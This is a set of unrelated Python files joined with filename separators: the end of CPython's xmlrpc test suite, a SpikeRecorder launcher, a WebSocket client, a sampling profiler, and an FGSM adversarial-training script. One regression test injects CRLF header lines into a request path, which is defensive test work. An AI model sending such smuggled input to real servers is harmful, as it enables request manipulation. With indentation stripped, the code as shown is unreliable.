if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy(URL)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<type \'exceptions.Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
self.assertTrue(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
def test_partial_post(self):
# Check that a partial POST doesn't make the server loop: issue #14001.
conn = httplib.HTTPConnection(ADDR, PORT)
conn.request('POST', '/RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nbye')
conn.close()
class SimpleServerEncodingTestCase(BaseServerTestCase):
@staticmethod
def threadFunc(evt, numrequests, requestHandler=None, encoding=None):
http_server(evt, numrequests, requestHandler, 'iso-8859-15')
@test_support.requires_unicode
def test_server_encoding(self):
start_string = unichr(0x20ac)
end_string = unichr(0xa4)
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
class MultiPathServerTestCase(BaseServerTestCase):
threadFunc = staticmethod(http_multi_server)
request_count = 2
def test_path1(self):
p = xmlrpclib.ServerProxy(URL+"/foo")
self.assertEqual(p.pow(6,8), 6**8)
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
def test_path2(self):
p = xmlrpclib.ServerProxy(URL+"/foo/bar")
self.assertEqual(p.add(6,8), 6+8)
self.assertRaises(xmlrpclib.Fault, p.pow, 6, 8)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class BaseKeepaliveServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
myRequests = []
def handle(self):
self.myRequests.append([])
self.reqidx = len(self.myRequests)-1
return self.parentClass.handle(self)
def handle_one_request(self):
result = self.parentClass.handle_one_request(self)
self.myRequests[self.reqidx].append(self.raw_requestline)
return result
requestHandler = RequestHandler
def setUp(self):
#clear request log
self.RequestHandler.myRequests = []
return BaseServerTestCase.setUp(self)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class KeepaliveServerTestCase1(BaseKeepaliveServerTestCase):
def test_two(self):
p = xmlrpclib.ServerProxy(URL)
#do three requests.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
#they should have all been handled by a single request handler
self.assertEqual(len(self.RequestHandler.myRequests), 1)
#check that we did at least two (the third may be pending append
#due to thread scheduling)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
#test special attribute access on the serverproxy, through the __call__
#function.
class KeepaliveServerTestCase2(BaseKeepaliveServerTestCase):
#ask for two keepalive requests to be handled.
request_count=2
def test_close(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")() #this should trigger a new keep-alive request
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
#there should have been two request handlers in total, each having logged at least
#two complete requests
self.assertEqual(len(self.RequestHandler.myRequests), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-2]), 2)
def test_transport(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
p("transport").close() #same as above, really.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(len(self.RequestHandler.myRequests), 2)
#A test case that verifies that gzip encoding works in both directions
#(for a request and the response)
@unittest.skipUnless(gzip, 'gzip not available')
class GzipServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
def do_POST(self):
#store content of last request in class
self.__class__.content_length = int(self.headers["content-length"])
return self.parentClass.do_POST(self)
requestHandler = RequestHandler
class Transport(xmlrpclib.Transport):
#custom transport, stores the response length for our perusal
fake_gzip = False
def parse_response(self, response):
self.response_length=int(response.getheader("content-length", 0))
return xmlrpclib.Transport.parse_response(self, response)
def send_content(self, connection, body):
if self.fake_gzip:
#add a lone gzip header to induce decode error remotely
connection.putheader("Content-Encoding", "gzip")
return xmlrpclib.Transport.send_content(self, connection, body)
def setUp(self):
BaseServerTestCase.setUp(self)
def test_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
p = xmlrpclib.ServerProxy(URL, transport=t)
self.assertEqual(p.pow(6,8), 6**8)
a = self.RequestHandler.content_length
t.encode_threshold = 0 #turn on request encoding
self.assertEqual(p.pow(6,8), 6**8)
b = self.RequestHandler.content_length
self.assertTrue(a>b)
def test_bad_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
t.fake_gzip = True
p = xmlrpclib.ServerProxy(URL, transport=t)
cm = self.assertRaisesRegexp(xmlrpclib.ProtocolError,
re.compile(r"\b400\b"))
with cm:
p.pow(6, 8)
def test_gzip_response(self):
t = self.Transport()
p = xmlrpclib.ServerProxy(URL, transport=t)
old = self.requestHandler.encode_threshold
self.requestHandler.encode_threshold = None #no encoding
self.assertEqual(p.pow(6,8), 6**8)
a = t.response_length
self.requestHandler.encode_threshold = 0 #always encode
self.assertEqual(p.pow(6,8), 6**8)
b = t.response_length
self.requestHandler.encode_threshold = old
self.assertTrue(a>b)
def test_gzip_decode_limit(self):
max_gzip_decode = 20 * 1024 * 1024
data = '\0' * max_gzip_decode
encoded = xmlrpclib.gzip_encode(data)
decoded = xmlrpclib.gzip_decode(encoded)
self.assertEqual(len(decoded), max_gzip_decode)
data = '\0' * (max_gzip_decode + 1)
encoded = xmlrpclib.gzip_encode(data)
with self.assertRaisesRegexp(ValueError,
"max gzipped payload length exceeded"):
xmlrpclib.gzip_decode(encoded)
xmlrpclib.gzip_decode(encoded, max_decode=-1)
#Test special attributes of the ServerProxy object
class ServerProxyTestCase(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
if threading:
self.url = URL
else:
# Without threading, http_server() and http_multi_server() will not
# be executed and URL is still equal to None. 'http://' is just
# enough to choose the scheme (HTTP).
self.url = 'http://'
def test_close(self):
p = xmlrpclib.ServerProxy(self.url)
self.assertEqual(p('close')(), None)
def test_transport(self):
t = xmlrpclib.Transport()
p = xmlrpclib.ServerProxy(self.url, transport=t)
self.assertEqual(p('transport'), t)
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
def __getitem__(self, key):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return mimetools.Message.__getitem__(self, key)
@unittest.skipUnless(threading, 'Threading required for this test.')
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message
def test_basic(self):
# check that flag is false by default
flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("x-exception"), expected_err)
self.assertTrue(e.headers.get("x-traceback") is not None)
else:
self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
with test_support.EnvironmentVarGuard() as env:
env['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
with test_support.captured_stdout() as data_out:
self.cgi.handle_request()
# parse Status header
data_out.seek(0)
handle = data_out.read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
with test_support.EnvironmentVarGuard() as env, \
test_support.captured_stdout() as data_out, \
test_support.captured_stdin() as data_in:
data_in.write(data)
data_in.seek(0)
env['CONTENT_LENGTH'] = str(len(data))
self.cgi.handle_request()
data_out.seek(0)
# will respond exception, if so, our goal is achieved ;)
handle = data_out.read()
# start with 44th char so as not to get http header, we just need only xml
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
# Also test the content-length returned by handle_request
# Using the same test method in order to avoid all the data-passing
# boilerplate code.
# Test for bug: http://bugs.python.org/issue5040
content = handle[handle.find("<?xml"):]
self.assertEqual(
int(re.search('Content-Length: (\d+)', handle).group(1)),
len(content))
class FakeSocket:
def __init__(self):
self.data = StringIO.StringIO()
def send(self, buf):
self.data.write(buf)
return len(buf)
def sendall(self, buf):
self.data.write(buf)
def getvalue(self):
return self.data.getvalue()
def makefile(self, x='r', y=-1):
raise RuntimeError
def close(self):
pass
class FakeTransport(xmlrpclib.Transport):
"""A Transport instance that records instead of sending a request.
This class replaces the actual socket used by httplib with a
FakeSocket object that records the request. It doesn't provide a
response.
"""
def make_connection(self, host):
conn = xmlrpclib.Transport.make_connection(self, host)
conn.sock = self.fake_socket = FakeSocket()
return conn
class TransportSubclassTestCase(unittest.TestCase):
def issue_request(self, transport_class):
"""Return an HTTP request made via transport_class."""
transport = transport_class()
proxy = xmlrpclib.ServerProxy("http://example.com/",
transport=transport)
try:
proxy.pow(6, 8)
except RuntimeError:
return transport.fake_socket.getvalue()
return None
def test_custom_user_agent(self):
class TestTransport(FakeTransport):
def send_user_agent(self, conn):
xmlrpclib.Transport.send_user_agent(self, conn)
conn.putheader("X-Test", "test_custom_user_agent")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_custom_user_agent\r\n", req)
def test_send_host(self):
class TestTransport(FakeTransport):
def send_host(self, conn, host):
xmlrpclib.Transport.send_host(self, conn, host)
conn.putheader("X-Test", "test_send_host")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_host\r\n", req)
def test_send_request(self):
class TestTransport(FakeTransport):
def send_request(self, conn, url, body):
xmlrpclib.Transport.send_request(self, conn, url, body)
conn.putheader("X-Test", "test_send_request")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_request\r\n", req)
def test_send_content(self):
class TestTransport(FakeTransport):
def send_content(self, conn, body):
conn.putheader("X-Test", "test_send_content")
xmlrpclib.Transport.send_content(self, conn, body)
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_content\r\n", req)
@test_support.reap_threads
def test_main():
xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase, TransportSubclassTestCase]
xmlrpc_tests.append(SimpleServerTestCase)
xmlrpc_tests.append(SimpleServerEncodingTestCase)
xmlrpc_tests.append(KeepaliveServerTestCase1)
xmlrpc_tests.append(KeepaliveServerTestCase2)
xmlrpc_tests.append(GzipServerTestCase)
xmlrpc_tests.append(MultiPathServerTestCase)
xmlrpc_tests.append(ServerProxyTestCase)
xmlrpc_tests.append(FailingServerTestCase)
xmlrpc_tests.append(CGIHandlerTestCase)
test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
test_main()
|
__init__.py
|
# -*- coding: utf-8 -*-
import os
import sys
import platform
import multiprocessing
from multiprocessing import Process, Queue
from ._core import __doc__, run
from ._core import __file__ as module_file_path
# Fix for MacOS High Sierra, see:
# https://stackoverflow.com/questions/30669659/multiproccesing-and-error-the-process-has-forked-and-you-cannot-use-this-corefou
if platform.system() == "Darwin":
multiprocessing.set_start_method('spawn', force=True)
def _run_wrapper():
"""
A simple wrapper that changes the working directory before launching the SpikeRecorder pybind11 module.
The module needs to run from the directory it is installed in because it looks for its files there.
"""
os.chdir(os.path.dirname(os.path.abspath(__file__)))
log_file_path = os.path.join(os.path.dirname(module_file_path), 'byb.log')
run(log_file_path)
def launch(is_async: bool = False) -> multiprocessing.Process:
"""
Launch the Backyard Brains Spike Recorder application. This function launches a subprocess.
Args:
is_async: Whether this function should run asynchronously, i.e. return immediately instead of
blocking until the application closes.
Returns:
The Process containing the SpikeRecorder application.
"""
p = Process(target=_run_wrapper)
p.start()
if not is_async:
p.join()
return p
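# A minimal asynchronous usage sketch (illustrative only):
#
#     proc = launch(is_async=True)   # returns immediately
#     # ... do other work while SpikeRecorder runs ...
#     proc.join()                    # wait for the application to close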
def main():
launch()
if __name__ == "__main__":
main()
|
ws_api_socket.py
|
from functools import partial
from befh.api_socket import ApiSocket
from befh.util import Logger
import websocket
import threading
import json
import time
import zlib
class WebSocketApiClient(ApiSocket):
"""
    Generic WebSocket API client
"""
def __init__(self, id, received_data_compressed=False, proxy=None):
"""
Constructor
:param id: Socket id
"""
ApiSocket.__init__(self)
self.ws = None # Web socket
self.id = id
self.wst = None # Web socket thread
self._connecting = False
self._connected = False
self._received_data_compressed = received_data_compressed
self.on_message_handlers = []
self.on_open_handlers = []
self.on_close_handlers = []
self.on_error_handlers = []
def connect(self, url,
on_message_handler=None,
on_open_handler=None,
on_close_handler=None,
on_error_handler=None,
reconnect_interval=10):
"""
        :param url: URL of the websocket server
        :param on_message_handler: Message handler which takes the message as
                                   the first argument
        :param on_open_handler: Socket open handler which takes the socket as
                                the first argument
        :param on_close_handler: Socket close handler which takes the socket as
                                 the first argument
        :param on_error_handler: Socket error handler which takes the socket as
                                 the first argument and the error as the second
                                 argument
        :param reconnect_interval: The time interval, in seconds, between reconnection attempts
"""
if on_message_handler is not None:
self.on_message_handlers.append(on_message_handler)
if on_open_handler is not None:
self.on_open_handlers.append(on_open_handler)
if on_close_handler is not None:
self.on_close_handlers.append(on_close_handler)
if on_error_handler is not None:
self.on_error_handlers.append(on_error_handler)
if not self._connecting and not self._connected:
Logger.info(self.__class__.__name__, "Connecting to socket <%s>..." % self.id)
self._connecting = True
self.ws = websocket.WebSocketApp(url,
on_message=partial(self.__on_message, self.ws),
on_close=partial(self.__on_close, self.ws),
on_open=partial(self.__on_open, self.ws),
on_error=partial(self.__on_error, self.ws))
self.wst = threading.Thread(target=lambda: self.__start(reconnect_interval=reconnect_interval))
self.wst.start()
else:
Logger.info(self.__class__.__name__, "Already connecting or connected <%s>..." % self.id)
return self.wst
def send(self, msg):
"""
Send message
:param msg: Message
:return:
"""
self.ws.send(msg)
def __start(self, reconnect_interval=10):
while True:
self.ws.run_forever()
Logger.info(self.__class__.__name__, "Socket <%s> is going to reconnect..." % self.id)
time.sleep(reconnect_interval)
def __on_message(self, foo, ws, m):
if self._received_data_compressed is True:
data = zlib.decompress(m, zlib.MAX_WBITS|16).decode('UTF-8')
m = json.loads(data)
else:
m = json.loads(m)
if len(self.on_message_handlers) > 0:
for handler in self.on_message_handlers:
handler(m)
def __on_open(self, foo, ws):
Logger.info(self.__class__.__name__, "Socket <%s> is opened." % self.id)
self._connected = True
if len(self.on_open_handlers) > 0:
for handler in self.on_open_handlers:
try:
handler(ws)
except Exception as e:
print(e)
def __on_close(self, foo, ws):
Logger.info(self.__class__.__name__, "Socket <%s> is closed." % self.id)
self._connecting = False
self._connected = False
if len(self.on_close_handlers) > 0:
for handler in self.on_close_handlers:
try:
handler(ws)
except Exception as e:
print(e)
def __on_error(self, foo, ws, error):
Logger.info(self.__class__.__name__, "Socket <%s> error:\n %s" % (self.id, error))
if len(self.on_error_handlers) > 0:
for handler in self.on_error_handlers:
try:
handler(ws, error)
except Exception as e:
print(e)
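# Usage sketch (hedged; the URL below is hypothetical): register handlers before
# connecting. Message handlers receive the decoded JSON payload; open/close/error
# handlers receive the socket (and, for error handlers, the error).
#
#     def on_message(msg):
#         print('received:', msg)
#
#     client = WebSocketApiClient('demo')
#     client.connect('ws://echo.example.com/ws', on_message_handler=on_message)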
if __name__ == '__main__':
Logger.init_log()
socket = WebSocketApiClient('test')
socket.connect('ws://localhost', reconnect_interval=1)
time.sleep(10)
|
sampro.py
|
'''
Data is kept in two dictionaries:
1- rooted_leaf_counts; this is the number of samples on each function/line number pair.
   This data can be used to answer the question "where are my threads spending their time?"
   and is useful for finding hotspots. Counts are namespaced by root function, which is a
   decent proxy for thread.
   Because there is at most one counter per line of code x root function pair, this data
   structure is left unbounded (no size cap is applied).
2- stack_counts; this is a count of samples for each unique call stack.
   This data gives a more detailed view, since each unique call stack
   has an independent count.
   Because there may be combinatorially many unique stacks, this data structure
   is capped at max_stacks entries. If the cap is exceeded, a count of skipped
   stack samples is kept instead.
'''
import sys
import threading
import signal
import collections
import time
import random
# A given call chain can be represented as a list of 2-tuples:
# [ (code object, line no), (code_object, line no) ... ]
# In particular for a sampling profiler, we are interested in
# seeing which "call patterns" are hot, so the representation used will be:
# { (caller code object, caller line no, callee code object) : count }
class _BaseSampler(object):
'''
A Sampler that will periodically sample the running stacks of all Python threads.
'''
def __init__(self):
self.rooted_leaf_counts = collections.defaultdict(lambda: collections.defaultdict(int))
self.stack_counts = {}
self.max_stacks = 10000
self.skipped_stack_samples = 0
self.sample_count = 0 # convenience for calculating percentages
def sample(self):
self.sample_count += 1
sampler_frame = sys._getframe()
cur_samples = []
for thread_id, frame in sys._current_frames().items():
if frame is sampler_frame:
continue
stack = []
cur = frame
while cur:
stack.extend((cur.f_code, cur.f_lineno))
cur, last = cur.f_back, cur
self.rooted_leaf_counts[last.f_code][(frame.f_code, frame.f_lineno)] += 1
stack = tuple(stack)
            if stack not in self.stack_counts:
                if len(self.stack_counts) >= self.max_stacks:
                    # over the cap: skip the new unique stack, but count the skipped sample
                    self.skipped_stack_samples += 1
                else:
                    self.stack_counts[stack] = 1
            else:
                self.stack_counts[stack] += 1
def live_data_copy(self):
rooted_leaf_counts = {}
for k, v in self.rooted_leaf_counts.items():
rooted_leaf_counts[k] = dict(v)
return rooted_leaf_counts, dict(self.stack_counts)
def rooted_samples_by_file(self):
'''
Get sample counts by file, and root thread function.
        (Useful for answering questions like "what modules are hot?")
'''
rooted_leaf_samples, _ = self.live_data_copy()
rooted_file_samples = {}
for root, counts in rooted_leaf_samples.items():
cur = {}
for key, count in counts.items():
code, lineno = key
cur.setdefault(code.co_filename, 0)
cur[code.co_filename] += count
rooted_file_samples[root] = cur
return rooted_file_samples
def rooted_samples_by_line(self, filename):
'''
Get sample counts by line, and root thread function.
(For one file, specified as a parameter.)
This is useful for generating "side-by-side" views of
source code and samples.
'''
rooted_leaf_samples, _ = self.live_data_copy()
rooted_line_samples = {}
for root, counts in rooted_leaf_samples.items():
cur = {}
for key, count in counts.items():
code, lineno = key
if code.co_filename != filename:
continue
cur[lineno] = count
rooted_line_samples[root] = cur
return rooted_line_samples
def hotspots(self):
'''
        Get lines sampled across all threads, in order
from most to least sampled.
'''
rooted_leaf_samples, _ = self.live_data_copy()
line_samples = {}
for _, counts in rooted_leaf_samples.items():
for key, count in counts.items():
line_samples.setdefault(key, 0)
line_samples[key] += count
return sorted(
line_samples.items(), key=lambda v: v[1], reverse=True)
def flame_map(self):
'''
return sampled stacks in form suitable for inclusion in a
flame graph (https://github.com/brendangregg/FlameGraph)
'''
flame_map = {}
_, stack_counts = self.live_data_copy()
for stack, count in stack_counts.items():
root = stack[-2].co_name
stack_elements = []
for i in range(len(stack)):
                if isinstance(stack[i], int):  # skip line numbers; keep only code objects
continue
code = stack[i]
stack_elements.append("{0}`{1}`{2}".format(
root, code.co_filename, code.co_name))
flame_key = ';'.join(stack_elements)
flame_map.setdefault(flame_key, 0)
flame_map[flame_key] += count
return flame_map
def start(self):
        raise NotImplementedError()
    def stop(self):
        raise NotImplementedError()
class ThreadedSampler(_BaseSampler):
'''
This implementation relies on a thread and sleep.
'''
def __init__(self):
super(ThreadedSampler, self).__init__()
self.stopping = threading.Event()
self.data_lock = threading.Lock()
self.thread = None
self.started = False
def start(self):
'start a background thread that will sample ~50x per second'
if self.started:
raise ValueError("Sampler.start() may only be called once")
self.started = True
self.thread = threading.Thread(target=self._run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.stopping.set()
def _run(self):
while not self.stopping.wait(0.01 * (1 + random.random())):
self.sample()
# sample 50x per second
# NOTE: sleep for a random amount of time to avoid syncing with
# other processes (e.g. if another thread is doing something at
# a regular interval, we may always catch that process at the
# same point in its cycle)
Sampler = ThreadedSampler
if hasattr(signal, "setitimer"):
class SignalSampler(_BaseSampler):
def __init__(self, which="real"):
'''
Gather performance samples ~50x / second using interrupt timers.
One of "real", "virtual", or "prof".
From setitimer man page, meaning of these values:
real: decrements in real time, and delivers SIGALRM upon expiration.
virtual: decrements only when the process is executing, and
delivers SIGVTALRM upon expiration.
prof: decrements both when the process executes and when the
system is executing on behalf of the process. Coupled
with ITIMER_VIRTUAL, this timer is usually used to
profile the time spent by the application in user and
kernel space. SIGPROF is delivered upon expiration.
Note that signals are inherently global for the entire process.
'''
super(SignalSampler, self).__init__()
try:
_which = {
'real': signal.ITIMER_REAL,
'virtual': signal.ITIMER_VIRTUAL,
'prof': signal.ITIMER_PROF
}[which]
except KeyError:
raise ValueError("which must be one of 'real', 'virtual', or 'prof'"
" (got {0})".format(repr(which)))
self.which = _which
self.signal = {
signal.ITIMER_REAL: signal.SIGALRM,
signal.ITIMER_VIRTUAL: signal.SIGVTALRM,
signal.ITIMER_PROF: signal.SIGPROF}[self.which]
if signal.getsignal(self.signal) not in (None, signal.SIG_DFL, signal.SIG_IGN):
raise EnvironmentError("handler already attached for signal")
self.started = False
self.stopping = False
def start(self):
'start sampling interrupts'
if self.started:
return
self.started = True
self.rollback = signal.signal(self.signal, self._resample)
signal.setitimer(self.which, 0.01 * (1 + random.random()))
def stop(self):
if not self.started:
return
self.stopping = True
signal.setitimer(self.which, 0)
signal.signal(self.signal, self.rollback)
def _resample(self, signum, frame):
if self.stopping:
return
self.sample()
signal.setitimer(self.which, 0.01 * (1 + random.random()))
Sampler = SignalSampler
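# Minimal self-test sketch (an addition, not part of the original module): start a
# sampler, burn some CPU in the main thread, then print the hottest sampled lines.
if __name__ == '__main__':
    def _busy():
        total = 0
        for i in range(200000):
            total += i * i
        return total

    _sampler = Sampler()
    _sampler.start()
    for _ in range(100):
        _busy()
    _sampler.stop()
    for (code, lineno), count in _sampler.hotspots()[:5]:
        print('%s:%d  %d samples' % (code.co_filename, lineno, count))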
|
train.py
|
import threading
from time import time
import tensorflow as tf
from models.load_data import *
from tensorflow.contrib.slim.nets import inception
from adv_imagenet_models import inception_resnet_v2
from attacks import fgsm
summary_path = '/home/yangfan/ensemble_training'
ALPHA = 0.5
EPSILON = 0.3
learning_rate = 0.001
display_step = 100
test_step = 100
epochs = 90
save_path = '/home/yangfan/ensemble_training/ens4-inception.ckpt'
train_size = imagenet_size()
num_batches = int(float(train_size) / BATCH_SIZE)
x = tf.placeholder(dtype=tf.float32, shape=[None, 299, 299, 3])
y = tf.placeholder(dtype=tf.float32, shape=[None, 1000])
lr = tf.placeholder(tf.float32)
# keep_prob = tf.placeholder(tf.float32)
with tf.device('/cpu:0'):
q = tf.FIFOQueue(BATCH_SIZE, [tf.float32, tf.float32], shapes=[[299, 299, 3], [1000]])
enqueue_op = q.enqueue_many([x, y])
    x_b, y_b = q.dequeue_many(BATCH_SIZE // 4)  # integer batch size
logits, end_points = inception.inception_v3(x_b, is_training=True)
with tf.name_scope('cross_entropy'):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_b, logits=logits)
with tf.name_scope('l2_loss'):
l2_loss = tf.reduce_sum(5e-4 * tf.stack([tf.nn.l2_loss(v) for v in tf.get_collection('weights')]))
tf.summary.scalar('l2_loss', l2_loss)
with tf.name_scope('loss'):
loss = cross_entropy + l2_loss
tf.summary.scalar('loss', loss)
with tf.name_scope('accuracy'):
    correct = tf.equal(tf.argmax(logits, 1), tf.argmax(y_b, 1))  # compare against the dequeued labels
accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))
tf.summary.scalar('accuracy', accuracy)
global_step = tf.Variable(0, trainable=False)
epoch = tf.div(global_step, num_batches)
with tf.name_scope('optimizer'):
optimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.9).minimize(loss, global_step=global_step)
merged = tf.summary.merge_all()
saver = tf.train.Saver()
coord = tf.train.Coordinator()
init = tf.global_variables_initializer()
def get_adversarial(sess_trained, x, probs, image):
x_adv = fgsm(x=x, predictions=probs, eps=0.3, clip_max=1.0, clip_min=-1.0)
img_adv = sess_trained.run(x_adv, feed_dict={x:image})
return img_adv
with tf.Session(config=tf.ConfigProto()) as sess_train:
sess_train.run(init)
def enqueue_batches():
while not coord.should_stop():
            ori_imgs, labels = read_batch(batch_size=BATCH_SIZE // 2)
            adv_imgs = get_adversarial(sess_trained=sess_train, x=x_b, probs=end_points['Predictions'], image=ori_imgs)
            imgs = np.vstack([ori_imgs, adv_imgs])
            lbs = np.vstack([labels, labels])  # adversarial examples keep the labels of their clean counterparts
            sess_train.run(enqueue_op, feed_dict={x: imgs, y: lbs})
num_threads = 4
for i in range(num_threads):
t = threading.Thread(target=enqueue_batches)
t.setDaemon(True)
t.start()
train_writer = tf.summary.FileWriter(os.path.join(summary_path, 'train'), sess_train.graph)
start_time = time()
for e in range(sess_train.run(epoch), epochs):
for i in range(num_batches):
_, step = sess_train.run([optimizer, global_step], feed_dict={lr:learning_rate})
if step == 170000 or step == 350000:
learning_rate /= 10
if step % display_step == 0:
c, a = sess_train.run([loss, accuracy], feed_dict={lr:learning_rate})
print('Epoch: {:03d} Step/Batch: {:09d} --- Loss: {:.7f} Training accuracy: {:.4f}'.format(e, step, c, a))
if step % test_step == 0:
pass
end_time = time()
    print('Elapsed time: {}'.format(format_time(end_time - start_time)))
